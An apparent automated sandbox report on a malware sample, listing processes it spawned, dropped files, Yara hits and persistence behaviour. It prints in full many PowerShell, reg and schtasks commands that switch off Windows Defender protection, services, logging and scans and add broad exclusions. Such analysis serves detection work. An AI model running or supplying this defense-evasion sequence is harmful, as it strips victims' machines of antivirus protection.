            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSIBF92.tmp "C:\Windows\Installer\MSIBF92.tmp" /EnforcedRunAsAdmin /DontWait /HideWindow "C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6 -Force"
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSIBFC2.tmp "C:\Windows\Installer\MSIBFC2.tmp" /EnforcedRunAsAdmin /DontWait /RunAsAdmin /HideWindow "C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exe"
            Source: unknownProcess created: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe "C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\Installer\MSIBFC2.tmpProcess created: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exe "C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exe"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6 -Force"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6 -Force"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -ScanScheduleDay 8 -Force"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -DisableCatchupFullScan 1 -Force"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -DisableCatchupQuickScan 1 -Force"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -DisableScriptScanning 1 -Force"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -ScanAvgCPULoadFactor 5 -Force"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -ServiceHealthReportInterval 0 -Force"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -UnknownThreatDefaultAction 6 -Force"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10 /nobreak
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI551D.tmp "C:\Windows\Installer\MSI551D.tmp" /EnforcedRunAsAdmin /DontWait /RunAsAdmin /HideWindow "C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe"
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSIBF81.tmp "C:\Windows\Installer\MSIBF81.tmp" /EnforcedRunAsAdmin /DontWait /HideWindow "C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\Narsil.exe"
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSIBF92.tmp "C:\Windows\Installer\MSIBF92.tmp" /EnforcedRunAsAdmin /DontWait /HideWindow "C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe"
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSIBFC2.tmp "C:\Windows\Installer\MSIBFC2.tmp" /EnforcedRunAsAdmin /DontWait /RunAsAdmin /HideWindow "C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exe"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -PUAProtection disable" -Force"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10 /nobreak
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\5C5C.tmp\5C5D.tmp\5C5E.bat C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Add-MpPreference -ExclusionPath "C:\Users\user\Appdata\Local" -Force"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Add-MpPreference -ExclusionPath "C:\ProgramData" -Force"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Add-MpPreference -ExclusionPath "C:\Windows" -Force"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Add-MpPreference -AttackSurfaceReductionOnlyExclusions "C:\Users\user\Appdata\Local" -Force"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Add-MpPreference -ExclusionProcess "MsBuild.exe" -Force"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -PUAProtection disable" -Force"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6 -Force"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6 -Force"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6 -Force"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -ScanScheduleDay 8 -Force"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -DisableCatchupFullScan 1 -Force"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -DisableCatchupQuickScan 1 -Force"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -DisableScriptScanning 1 -Force"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -ScanAvgCPULoadFactor 5 -Force"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -ServiceHealthReportInterval 0 -Force"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -UnknownThreatDefaultAction 6 -Force"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: JWQgbclQK5Static file information: File size 33220376 > 1048576

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000037.00000002.1817217674.0000000004DC3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000037.00000002.1802305485.0000000003035000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000037.00000002.1951876750.0000000007470000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000037.00000002.1879276919.0000000006654000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000037.00000002.1879276919.0000000006141000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000076.00000002.2429256257.00000000031F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000078.00000002.2419373692.000001B22960C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000078.00000002.2419373692.000001B22973A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: JWQgbclQK5Static PE information: section name: .sxdata

            Persistence and Installation Behavior

            barindex
            Source: C:\Windows\System32\msiexec.exeExecutable created and started: C:\Windows\Installer\MSIBF81.tmp
            Source: C:\Windows\System32\msiexec.exeExecutable created and started: C:\Windows\Installer\MSI551D.tmp
            Source: C:\Windows\System32\msiexec.exeExecutable created and started: C:\Windows\Installer\MSIBFC2.tmp
            Source: C:\Windows\System32\msiexec.exeExecutable created and started: C:\Windows\Installer\MSIBF92.tmp
            Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
            Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
            Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
            Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
            Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
            Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
            Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
            Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
            Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
            Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
            Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
            Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
            Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
            Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
            Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
            Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
            Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
            Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
            Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
            Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
            Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
            Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
            Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
            Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
            Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
            Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
            Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
            Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
            Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
            Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
            Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
            Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
            Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
            Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
            Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
            Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
            Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
            Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
            Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC26F.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC30F.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIBFC2.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeFile created: C:\Users\user\AppData\Local\Temp\shi3348.tmpJump to dropped file
